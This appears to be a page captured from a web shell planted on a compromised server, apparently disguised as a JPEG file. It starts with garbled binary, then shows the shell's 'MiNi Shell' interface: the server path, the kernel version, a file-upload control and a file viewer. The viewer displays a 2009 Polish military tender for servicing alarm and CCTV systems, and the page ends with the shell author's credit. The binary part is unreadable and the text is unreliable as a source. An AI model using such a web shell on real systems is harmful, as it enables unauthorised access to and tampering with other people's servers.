JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090121/23791-N-2009.html

<p class="kh_header"><b>Czerwieńsk: Wykonywanie usługi konserwacji i serwisu systemów alarmowych i STVP</b><br>
<b>Numer ogłoszenia: 23791 - 2009; data zamieszczenia: 21.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 1517 , ul. Składowa 10, 66-016 Czerwieńsk, woj. lubuskie, tel. 068 3210253, faks 068 3210245.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Obrona.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie usługi konserwacji i serwisu systemów alarmowych i STVP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest konserwacja i usługi serwisowe systemów alarmowych celem utrzymania stałej sprawności technicznej Systemów Sygnalizacji Włamania i Napadu (SSWiN) oraz Systemów Telewizji Przemysłowej (STVP) w n w obiektach Jednostki Wojskowej 1517 Czerwieńsk:
-    kompleks koszarowy k - 2605
-    park sprzętu technicznego k - 7187
-   Garnizonowe składy Techniczne k - 5719
Serwis i konserwacja SSWiN oraz STVP będzie prowadzona w trzech kompleksach Jednostki Wojskowej 1517, łącznie w 21 budynkach oraz na terenie otwartym w/w kompleksów. 
Główne elementy systemu SSWiN i STVP podlegające serwisowi i konserwacji:


Lp.	Nazwa urządzenia	Ilość
1.	Centrala alarmowa 	6
2.	Moduł rozszerzeń  (Podcentrala alarmowa)	99
3.	Czujka wewnętrzna ruchu	347
4.	Czujka stłuczenia szkła i czujka sejsmiczna 	56
5.	Czujka ppoż.	126
6.	Kontaktron	345
7.	Pilot napadowy	30
8.	Przycisk napadowy	3
9.	Bariera (czujka)  zewnętrzna	19
10.	Szyfrator	51
11.	Stacja monitorująca 	1
12.	Synoptyka na zestawie PC	1
13.	Monitor PC	3
14	Tablica synoptyczna	3
15.	Sygnalizator	9
16.	Kamera wewnętrzna	39
16.	Kamera zewnętrzna	14
17.	Nadajnik  radiowy	6
18.	Odbiornik radiowy	3
19.	Monitor STVP	10
20.	Magnetowid poklatkowy	2
21.	Rejestrator cyfrowy	2
22.	Multiplekser	4
23	Zasilacz buforowy	31
24	Akumulatory	46
25	Kabel sygnałowy	19,5 km

w/w ilości podstawowych elementów SSWiN oraz STVP mogą nieznacznie ulec zmianie w trakcie trwania usługi ze względu na przewidywaną rozbudowę systemu alarmowego. Ponadto usłudze podlegać będą również te elementy które nie zostały wymienione w/w wykazie, a stanowią integralną część systemu SSWiN i STVP. 
W/w podstawowe elementy i ich ilości mają na celu ułatwienie Wykonawcy dokonania wyceny przedmiotu zamówienia.  
 
Zakres prac konserwacyjnych
Przeprowadzenie czterech przeglądów konserwacyjnych, urządzeń i instalacji SSWiN i STVP na podstawie PN-93-E-8390/14 oraz Normy Obronnej NO-04-A004-8 (Obiekty wojskowe. Systemy alarmowe. Część 8: Eksploatacja), obejmujące:
sprawdzenie prawidłowego funkcjonowania wszystkich urządzeń wchodzących w skład systemu alarmowego i STVP 
przeprowadzenie  czyszczenia i regulacji urządzeń elektronicznych, smarowania i podmalowania elementów zasilania i elementów mechanicznych w tym również obudów szyfratorów  
sprawdzenie funkcjonowania  urządzeń transmisji alarmu
sprawdzenie i pełna konserwacja akumulatorów
sprawdzenie stanu izolacji przewodów  oraz przeglądów puszek połączeniowych
sprawdzenie stanu połączeń giętkich
 sprawdzenie układów przeciw sabotażowych poszczególnych urządzeń
sprawdzenie poprawności działania każdego urządzenia transmisji alarmu z centrum odbiorczym,
sprawdzenie sprawności działania całego systemu poprzez wywołanie próbnego alarmu

Przeglądy konserwacyjne będą przeprowadzone w marcu, czerwcu, wrześniu oraz grudniu 2009r. Dokładne terminy prowadzenia prac konserwacyjnych będą ustalane na bieżąco w trybie roboczym. 
Wszystkie materiały i sprzęt niezbędny do wykonania konserwacji zabezpiecza Wykonawca.
Po wykonaniu konserwacji  każdorazowo będzie sporządzany  protokół odbioru usługi oraz dokonywany zapis konserwacji w książce systemów alarmowych założonej przez Wykonawcę.

Usługa serwisowa związana jest z wystąpieniem awarii w systemie, i ma obejmować przegląd  poprawności działania całego systemu SSWiN lub STVP, oraz jego poszczególnych podzespołów i znalezienie przyczyn awarii.
Wykonawca zobowiązany jest w szczególności do: 
1.	wykonania diagnozy uszkodzenia sprzętu w miejscu jego zainstalowania;
2.	dostarczenia uszkodzonego sprzętu do punktu serwisowego - w przypadku  braku możliwości naprawy sprzętu w miejscu jego zainstalowania;
3.	 wykonania naprawy sprzętu;
4.	dostarczenia sprzętu do miejsca jego użytkowania po usunięciu przyczyny awarii;
5.	zainstalowania sprzętu zastępczego o parametrach nie gorszych niż zainstalowany sprzęt, w przypadku braku możliwości usunięcia awarii w miejscu użytkowania.
Podjęcie naprawy uszkodzonego systemu - w ciągu 4 godzin od chwili otrzymania telefonicznego zgłoszenia.
Jeżeli do wykonania naprawy konieczna będzie wymiana części, Zamawiający jest uprawiony do zakupu części od Wykonawcy albo od osób trzecich.
Usługa serwisowa realizowana będzie w trakcie realizacji umowy w zależności od potrzeb (awaria systemu SSWiN lub STVP).
Pozostałe ustalenia dotyczące realizacji zamówienia określa wzór umowy stanowiący załącznik  do niniejszej specyfikacji.

Zaleca się, aby Wykonawca dokonał na własny koszt wizji lokalnej istniejącego systemu alarmowego i STVP..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie wymaga się wnoszenia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W prowadzonym postępowaniu o udzielenie zamówienia mogą uczestniczyć Wykonawcy, którzy spełniają warunki Zamawiającego określone w niniejszej Specyfikacji Istotnych Warunków Zamówienia i wykażą że:

	
1.	Posiadają aktualny odpis z właściwego rejestru lub aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione (lub uaktualnione) przez odpowiedni, uprawniony do ich wystawienia organ, nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

2.	Złożą oświadczenie, że wykonawca nie zalega z opłacaniem podatków lub, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu (wg wzoru zawartego w załączniku nr 3); 


3.	   Złożą oświadczenie, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub społeczne, lub, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu (wg wzoru zawartego w załączniku nr 4);

4.	Złożą oświadczenie o spełnieniu przesłanek z art.22.ust.1 prawa zamówień publicznych (wg wzoru zawartego w załączniku nr 2);

5.	Posiadają ważną koncesję wydaną przez MSWiA na prowadzenie działalności w zakresie ochrony osób i mienia (zgodnie z Art.3 pkt. 2, Art.15 pkt.1 Ustawy o ochronie osób i mienia) 

6.	Wykonali w ciągu ostatnich trzech lat minimum trzy zadania w zakresie przedmiotu zamówienia i potwierdzą jego realizację referencjami uprzedniego zamawiającego  

7.	Zamówienie zrealizują pracownicy wykonawcy posiadający licencje pracowników ochrony technicznej II stopnia - nadzór techniczny- minimum dwóch, licencje pracowników ochrony technicznej I stopnia - serwisanci minimum czterech   (zgodnie z Art.25 pkt. 2, Art.28 i Art. 29 Ustawy o ochronie osób i mienia)  
    Zamówienie zrealizują pracownicy wykonawcy:
-nadzór techniczny - minimum dwie (2) osoby posiadające poświadczenia bezpieczeństwa osobowego o klauzuli minimum TAJNE, (zgodnie z: § 9 pkt. 5a Rozporządzenia MON z dnia 21 czerwca 2007 roku Dz.U. z 2007 Nr 126 poz. 876 i Dz.U. z 2008 nr 57 poz. 345 oraz Art. 20 Ustawy z dn. 22.01.1999r o ochronie informacji niejawnych  Dz. U. z  2005r. Nr 196, poz. 1631 wraz z późn. zm.)
-serwisanci przewidziani do wykonania przedmiotu zamówienia w pomieszczeniach specjalnych znajdujących się w strefie bezpieczeństwa klasy I - minimum (2) dwie osoby posiadające poświadczenia bezpieczeństwa osobowego o klauzuli minimum TAJNE, (zgodnie z: § 9 pkt. 5a Rozporządzenia MON z dnia 21 czerwca 2007 roku Dz.U. z 2007 Nr 126 poz. 876 i Dz.U. z 2008 nr 57 poz. 345 oraz Art. 20 Ustawy z dn. 22.01.1999r o ochronie informacji niejawnych  Dz. U. z  2005r. Nr 196, poz. 1631 wraz z późn. zm.)
-serwisanci przewidziani do wykonania przedmiotu zamówienia w pomieszczeniach znajdujących się w strefie bezpieczeństwa klasy II i strefie administracyjnej - minimum (2) dwie osoby posiadające poświadczenia bezpieczeństwa osobowego o klauzuli minimum POUFNE, (zgodnie z: § 9 pkt. 5a Rozporządzenia MON z dnia 21 czerwca 2007 roku Dz.U. z 2007 Nr 126 poz. 876 i Dz.U. z 2008 nr 57 poz. 345 oraz Art. 20 Ustawy z dn. 22.01.1999r o ochronie informacji niejawnych  Dz. U. z  2005r. Nr 196, poz. 1631 wraz z późn. zm.)

8.	Posiadają aktualne Świadectwo Bezpieczeństwa Przemysłowego minimum III (trzeciego) stopnia o klauzuli minimum TAJNE (zgodnie z: § 9 pkt. 5a Rozporządzenia MON z dnia 21 czerwca 2007 roku Dz.U. z 2007 Nr 126 poz. 876 i Dz.U. z 2008 nr 57 poz. 345)

9.	Zatrudniają Pełnomocnika ds. ochrony informacji niejawnych przeszkolonego przez służby ochrony państwa (zgodnie z Art.18  Ustawy o ochronie informacji niejawnych)


10.	Posiadają kancelarię tajną (zgodnie z Art.50 Ustawy o ochronie informacji niejawnych)


11.	Prowadzą całodobowy dyżur serwisowy, który umożliwia skierowanie grupy serwisowej do obiektu zamawiającego, w celu przystąpienia do usuwania awarii systemu alarmowego w czasie do 4 godz.  od zgłoszenia
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia- nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca  spełni  warunki  wymagane  przez  zamawiającego  przedstawiając  niżej  wymienione oświadczenia  i  dokumenty:

1.	Aktualny odpis z właściwego rejestru lub aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione (lub uaktualnione) przez odpowiedni, uprawniony do ich wystawienia organ, nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

2.	 Oświadczenie, że wykonawca nie zalega z opłacaniem podatków lub, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu (wg wzoru zawartego w załączniku nr 3); 

3   Oświadczenie, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub społeczne, lub, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu (wg wzoru zawartego w załączniku nr 4);

2.	Oświadczenie o spełnieniu przesłanek z art.22.ust.1 prawa zamówień publicznych (wg wzoru zawartego w załączniku nr 2);

3.	Kserokopia posiadanej  ważnej koncesji wydanej  przez MSWiA na prowadzenie działalności w zakresie ochrony osób i mienia (zgodnie z Art.3 pkt. 2, Art.15 pkt.1 Ustawy o ochronie osób i mienia) 

4.	Wykaz wykonanych w ciągu ostatnich trzech lat minimum trzech  zadań w zakresie przedmiotu zamówienia i potwierdzonych ich  realizację referencjami uprzedniego zamawiającego  Złącznik nr 5  

5.	Wykaz pracowników , którzy będą realizować zamówienie oraz kserokopie licencji pracowników ochrony technicznej I i II stopnia, wraz z kserokopiami poświadczeń bezpieczeństwa osobowego stwierdzające dopuszczenie do informacji niejawnych o klauzuli minimum  TAJNE  i POUFNE- w zależności od zajmowanego stanowiska lub wykonywanej funkcji w trakcie realizacji zamówienia, załącznik nr  6


6.	Kserokopia aktualnego  Świadectwa Bezpieczeństwa Przemysłowego minimum III (trzeciego) stopnia o klauzuli minimum TAJNE (zgodnie z: § 9 pkt. 5a Rozporządzenia MON z dnia 21 czerwca 2007 roku Dz.U. z 2007 Nr 126 poz. 876 i Dz.U. z 2008 nr 57 poz. 345)

7.	 Oświadczenie potwierdzające zatrudnienie pełnomocnika ds. ochrony informacji niejawnych załącznik nr 8 wraz z  Kserokopia zaświadczenia przeszkolenia pełnomocnika ds. ochrony informacji niejawnych przez służby ochrony państwa(wg wzoru zawartego w załączniku nr 8); 

10 Oświadczenie, że Wykonawca  posiadaj kancelarię tajną (zgodnie z Art.50 Ustawy o ochronie informacji niejawnych (wg wzoru zawartego w załączniku nr 7

11. Oświadczenie o posiadaniu całodobowego dyżuru serwisowego, który umożliwia skierowanie grupy serwisowej do obiektu zamawiającego, w celu przystąpienia do usuwania awarii systemu alarmowego w czasie do 4 godz. od zgłoszenia.  (wg wzoru zawartego w załączniku nr 9);



Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia- nie spełnia.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 50</li>
<li>2 - Cena za jedną roboczogodzinę usługi - 50</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.przetargi.army.mil.pl      www.4zpplot.mil.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 1517
ul. Składowa  10
66-016 Czerwieńsk.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2009 godzina 09:45, miejsce: Jednostka Wojskowa 1517
ul. Składowa  10
66-016 Czerwieńsk
Sala Komisja Przetargowej 112
lub pocztą na adres Zamawiającego-Kancelaria Sztabu.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com